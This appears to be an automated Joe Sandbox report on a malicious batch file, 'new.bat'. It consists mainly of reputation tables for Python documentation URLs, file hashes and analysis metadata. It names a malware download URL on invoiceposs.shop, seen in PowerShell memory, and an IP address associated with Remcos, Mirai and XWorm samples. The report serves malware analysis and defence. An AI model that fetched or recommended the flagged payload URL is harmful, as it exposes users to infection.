SourceDetectionScannerLabelLink
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=359000%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337250%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337210%Avira URL Cloudsafe
https://toml.io/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=359040%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=52370%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=327510%Avira URL Cloudsafe
https://peps.python.org/pep-0528/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=438820%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=43840%Avira URL Cloudsafe
http://bugs.python.org/issue221070%Avira URL Cloudsafe
https://peps.python.org/pep-0529/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306880%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=292350%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337100%Avira URL Cloudsafe
http://invoiceposs.shop:9005/FTSP.zip100%Avira URL Cloudmalware
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=327490%Avira URL Cloudsafe
https://peps.python.org/pep-0602/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16961990%Avira URL Cloudsafe
http://bugs.python.org/issue25280%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12305400%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=282380%Avira URL Cloudsafe
https://www.pypy.org/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42850%Avira URL Cloudsafe
https://peps.python.org/pep-0526/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=329720%Avira URL Cloudsafe
https://peps.python.org/pep-0634/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=65840%Avira URL Cloudsafe
https://peps.python.org/pep-0538/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=338180%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306610%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306700%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=172390%Avira URL Cloudsafe
https://peps.python.org/pep-0624/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=369170%Avira URL Cloudsafe
https://peps.python.org/pep-0623/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=292090%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=334070%Avira URL Cloudsafe
https://peps.python.org/pep-0657/0%Avira URL Cloudsafe
https://twisted.org/documents/11.0.0/api/twisted.python.components.html0%Avira URL Cloudsafe
https://pyyaml.org/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=335300%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=346160%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=357020%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=302620%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=238310%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=323140%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=215360%Avira URL Cloudsafe
http://svn.red-bean.com/bob/macholib/trunk/macholib/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51500%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=358130%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=348500%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=61370%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=358100%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=237220%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=324300%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=41950%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=226400%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=324170%Avira URL Cloudsafe
https://infra.psf.io0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=271810%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51750%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=325280%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=315530%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=348290%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=52373.1.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=359043.8.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=327513.8.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337213.8.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0528/init_config.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://toml.io/3.11.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337253.8.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=359003.8.html.17.drfalse
  • Avira URL Cloud: safe
unknown
https://datatracker.ietf.org/doc/html/rfc4122.htmluuid.html.17.dr, 2.5.html.17.drfalse
    high
    https://github.com/python/cpython/blob/main/Doc/whatsnew/3.11.rst3.11.html.17.drfalse
      high
      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=438823.8.html.17.drfalse
      • Avira URL Cloud: safe
      unknown
      https://docs.python.org/3/c-api/coro.htmlcoro.html.17.drfalse
        high
        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=43843.1.html.17.drfalse
        • Avira URL Cloud: safe
        unknown
        https://docs.python.org/3/c-api/long.htmllong.html.17.drfalse
          high
          http://bugs.python.org/issue22107filesystem.py.17.drfalse
          • Avira URL Cloud: safe
          unknown
          https://docs.python.org/3/search.htmlsearch.html.17.drfalse
            high
            https://www.python.org/community/lists/general.html.17.drfalse
              high
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64base64.py.17.drfalse
                high
                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000A.00000003.1822470393.000001EF1305F000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306883.8.html.17.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=327493.8.html.17.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/python/cpython/blob/main/Doc/extending/embedding.rstembedding.html.17.drfalse
                    high
                    https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=292353.8.html.17.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://peps.python.org/pep-0602/general.html.17.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337103.8.html.17.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://wiki.python.org/moin/IntegratedDevelopmentEnvironmentseditors.html.17.drfalse
                      high
                      https://peps.python.org/pep-0529/3.8.html.17.dr, unicode.html.17.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://docs.python.org/3/genindex-S.htmlgenindex-S.html.17.drfalse
                        high
                        http://bugs.python.org/issue2528filesystem.py.17.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16961993.1.html.17.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.redhat.comgeneral.html.17.drfalse
                          high
                          http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodetransports.py.17.drfalse
                            high
                            http://invoiceposs.shop:9005/FTSP.zippowershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12305403.8.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=282383.8.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://peps.python.org/pep-0526/3.8.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.pypy.org/introduction.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=329723.8.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://peps.python.org/pep-0538/init_config.html.17.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.ver)svchost.exe, 0000000A.00000002.3029148950.000001EF13200000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://mail.python.org/mailman3/lists/python-announce-list.python.org/general.html.17.drfalse
                                high
                                https://peps.python.org/pep-0634/typeobj.html.17.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42853.1.html.17.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=65843.8.html.17.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://docs.python.org/3/tutorial/interpreter.htmlinterpreter.html.17.drfalse
                                  high
                                  https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=338183.8.html.17.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306613.8.html.17.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/python/cpython/blob/main/Doc/library/xml.sax.handler.rstxml.sax.handler.html.17.drfalse
                                    high
                                    https://peps.python.org/pep-0624/3.11.html.17.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/pygments/pygments/issuescmdline.py.17.dr, cmdline.cpython-312.pyc.17.drfalse
                                      high
                                      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=172393.8.html.17.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://peps.python.org/pep-0623/unicode.html.17.dr, 3.12.html.17.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=306703.8.html.17.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wiki.python.org/moin/PythonBooksgeneral.html.17.drfalse
                                        high
                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=292093.8.html.17.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=334073.8.html.17.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=369173.8.html.17.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://twisted.org/documents/11.0.0/api/twisted.python.components.htmlunittest.mock-examples.html.17.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://peps.python.org/pep-0657/3.11.html.17.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://docs.python.org/3/whatsnew/3.8.html3.8.html.17.drfalse
                                          high
                                          https://mail.python.org/mailman3/lists/python-dev.python.org/general.html.17.drfalse
                                            high
                                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=323143.8.html.17.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=346163.8.html.17.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=357023.8.html.17.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://pyyaml.org/3.1.html.17.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://docs.python.org/3/library/re.html#re.subcore.cpython-312.pyc.17.drfalse
                                              high
                                              https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=335303.8.html.17.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.pyunittest.mock.html.17.drfalse
                                                high
                                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=238313.8.html.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=302623.8.html.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=215363.8.html.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://svn.red-bean.com/bob/macholib/trunk/macholib/README.ctypes.17.dr, fetch_macholib.bat.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51503.1.html.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/python/cpython/tree/3.12/Lib/xml/sax/handler.pyxml.sax.handler.html.17.drfalse
                                                  high
                                                  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/jitperfmaps.html.17.drfalse
                                                    high
                                                    https://github.com/python/cpython/issues/837433.8.html.17.drfalse
                                                      high
                                                      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=226403.8.html.17.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=61373.1.html.17.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=358103.8.html.17.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/pypa/pip/pull/3514req_file.cpython-312.pyc.17.drfalse
                                                        high
                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=358133.8.html.17.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=348503.8.html.17.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=324303.8.html.17.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=237223.8.html.17.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=41953.1.html.17.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/python/cpython/blob/main/Doc/c-api/unicode.rstunicode.html.17.drfalse
                                                          high
                                                          https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rstcapsule.html.17.drfalse
                                                            high
                                                            https://docs.python.org/3/library/xml.sax.handler.htmlxml.sax.handler.html.17.drfalse
                                                              high
                                                              https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=324173.8.html.17.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://docs.python.orgwhatnow.html.17.dr, 2.5.html.17.drfalse
                                                                high
                                                                https://docs.python.org/3/using/unix.htmlunix.html0.17.drfalse
                                                                  high
                                                                  https://infra.psf.iogeneral.html.17.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=271813.8.html.17.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://pypi.org/project/mockunittest.mock.html.17.drfalse
                                                                    high
                                                                    https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51753.1.html.17.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/python/cpython/blob/main/Doc/faq/general.rstgeneral.html.17.drfalse
                                                                      high
                                                                      https://ark.intel.com/content/www/us/en/ark/products/76088/intel-core-i7-4960hq-processor-6m-cache-u3.8.html.17.drfalse
                                                                        high
                                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=325283.8.html.17.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=348293.8.html.17.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=315533.8.html.17.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        154.216.16.111
                                                                        unknownSeychelles
                                                                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                        IP
                                                                        127.0.0.1
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1554412
                                                                        Start date and time:2024-11-12 14:29:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 1s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:19
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:new.bat
                                                                        Detection:MAL
                                                                        Classification:mal72.spre.winBAT@34/1071@0/2
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 1
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .bat
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.19.126.143, 2.19.126.149, 184.28.88.176, 107.22.247.231, 34.193.227.236, 18.207.85.246, 54.144.73.197, 162.159.61.3, 172.64.41.3, 184.28.90.27, 2.23.197.184, 88.221.168.141, 199.232.214.172, 2.16.164.112, 2.16.164.16, 2.16.164.91, 2.16.164.131, 2.16.164.107, 2.16.164.113, 192.168.2.4, 23.218.232.146
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3756 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                        • VT rate limit hit for: new.bat
                                                                        TimeTypeDescription
                                                                        08:30:09API Interceptor74x Sleep call for process: powershell.exe modified
                                                                        08:30:12API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        08:30:22API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                        08:31:33API Interceptor2339x Sleep call for process: conhost.exe modified
                                                                        No context
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        SKHT-ASShenzhenKatherineHengTechnologyInformationCofile.exeGet hashmaliciousRemcosBrowse
                                                                        • 154.216.20.185
                                                                        Salary Increase Letter_Nov 20244.exeGet hashmaliciousRemcosBrowse
                                                                        • 154.216.17.14
                                                                        vqsjh4.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        jwwofba5.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        wriww68k.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        wnbw86.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        dwhdbg.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        vsbeps.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        vkjqpc.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        dvwkja7.elfGet hashmaliciousMiraiBrowse
                                                                        • 154.216.16.109
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_aix_support.pyaba.batGet hashmaliciousUnknownBrowse
                                                                          tut.batGet hashmaliciousUnknownBrowse
                                                                            8n3W4yKYeB.exeGet hashmaliciousUnknownBrowse
                                                                              contract_review.exeGet hashmaliciousXWormBrowse
                                                                                new.batGet hashmaliciousUnknownBrowse
                                                                                  new.batGet hashmaliciousUnknownBrowse
                                                                                    pypa.pyGet hashmaliciousUnknownBrowse
                                                                                      C:\Users\user\Downloads\Extracted\Python\Python312\Lib\_collections_abc.pyaba.batGet hashmaliciousUnknownBrowse
                                                                                        tut.batGet hashmaliciousUnknownBrowse
                                                                                          8n3W4yKYeB.exeGet hashmaliciousUnknownBrowse
                                                                                            contract_review.exeGet hashmaliciousXWormBrowse
                                                                                              new.batGet hashmaliciousUnknownBrowse
                                                                                                new.batGet hashmaliciousUnknownBrowse
                                                                                                  pypa.pyGet hashmaliciousUnknownBrowse
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1310720
                                                                                                    Entropy (8bit):1.3073609121298175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrn:KooCEYhgYEL0In
                                                                                                    MD5:BAC3CD8207B7EF364B00BE15545BF33A
                                                                                                    SHA1:A488455EDEDF6C4853F61660664A1EAD016BD68F
                                                                                                    SHA-256:9DBF8B83D175EECF4C3021BD709B0315AE49B43A3C207F290DAE95B51936F9D5
                                                                                                    SHA-512:B1CDBCB9F5D0060A0B131A8D379720FC4A383E9F9143AA3EDE9D3929D1899FFCE99376B48C856FA5CA2F78EB82DD2FF8D3DCFDC3665408B2A5F1C087B743AAA4
                                                                                                    Malicious:false
                                                                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2616a6b7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1310720
                                                                                                    Entropy (8bit):0.4221692423675045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                                                    MD5:456910ADFF71B6AC96CD140059921FCF
                                                                                                    SHA1:CD641A9FA4DA94E1E7CE7CFC639BF58D3B1B9E05
                                                                                                    SHA-256:B15F68DBEA045453B8D988665A148CBAC5ED2BF3D673227E06120D20170A1E15
                                                                                                    SHA-512:F141767E057030E0F84AA99A04475653308B19C6C7C47DD53F83B0BB81D0F204013332EF169AA94A688AEF7E0BE67F2CC4AF6EC06884D246C64CE1FAB73CE7FD
                                                                                                    Malicious:false
                                                                                                    Preview:&...... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..........................................|A.................p.p2.....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16384
                                                                                                    Entropy (8bit):0.07647953810210162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:+ViyYeespXrCjn13a/RxvollcVO/lnlZMxZNQl:qiyzvW53qfQOewk
                                                                                                    MD5:C6DCD4DB2B0240B1B570DB2E453DA264
                                                                                                    SHA1:709BA30E0DA3B78B9360AEDA842BEAC369DBFF8E
                                                                                                    SHA-256:39F66BF0AE72F22BEDEB00AF3E8ECA58405BC8DFB346C64620CF047B71BBFB98
                                                                                                    SHA-512:DF58DE4399E506C47879FEFC72C611F50F25CE808B8D3650A393345200FD819F7EA73FE5FCBA9419476B76B3521998839C16113492091D4AF375C18C58CAACBA
                                                                                                    Malicious:false
                                                                                                    Preview:C..0.....................................;...{.......|.......{A..............{A......{A..........{A]................p.p2.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):5.150624185100461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UhgL+q2Pwkn2nKuAl9OmbnIFUt8YU4Uhbo1Zmw+YU4Uhb+LVkwOwkn2nKuAlz:KA+vYfHAahFUt8Fc1/+FeV5JfHAaSJ
                                                                                                    MD5:C2003E0F5DB5DC40A7FC5C9A179DA277
                                                                                                    SHA1:5BD9D100F9BE988612C9F9536164A018FA9C265F
                                                                                                    SHA-256:1EA9B9FB905694803B03BF6633C6B95CFBFD4BE28AD49CD0ADACA3EA5DC32BAC
                                                                                                    SHA-512:4CAFBD37D8680DDD4F35C4CAB17D57EA69B572D4F689BB4AEC2E52FF2A3A91676B65F3CC7B0D813F04D515435D164F96751C3625FE5411C162D0FF9DB2F3A181
                                                                                                    Malicious:false
                                                                                                    Preview:2024/11/12-08:30:11.151 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-08:30:11.153 1c9c Recovering log #3.2024/11/12-08:30:11.153 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):5.150624185100461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:HU4UhgL+q2Pwkn2nKuAl9OmbnIFUt8YU4Uhbo1Zmw+YU4Uhb+LVkwOwkn2nKuAlz:KA+vYfHAahFUt8Fc1/+FeV5JfHAaSJ
                                                                                                    MD5:C2003E0F5DB5DC40A7FC5C9A179DA277
                                                                                                    SHA1:5BD9D100F9BE988612C9F9536164A018FA9C265F
                                                                                                    SHA-256:1EA9B9FB905694803B03BF6633C6B95CFBFD4BE28AD49CD0ADACA3EA5DC32BAC
                                                                                                    SHA-512:4CAFBD37D8680DDD4F35C4CAB17D57EA69B572D4F689BB4AEC2E52FF2A3A91676B65F3CC7B0D813F04D515435D164F96751C3625FE5411C162D0FF9DB2F3A181
                                                                                                    Malicious:false
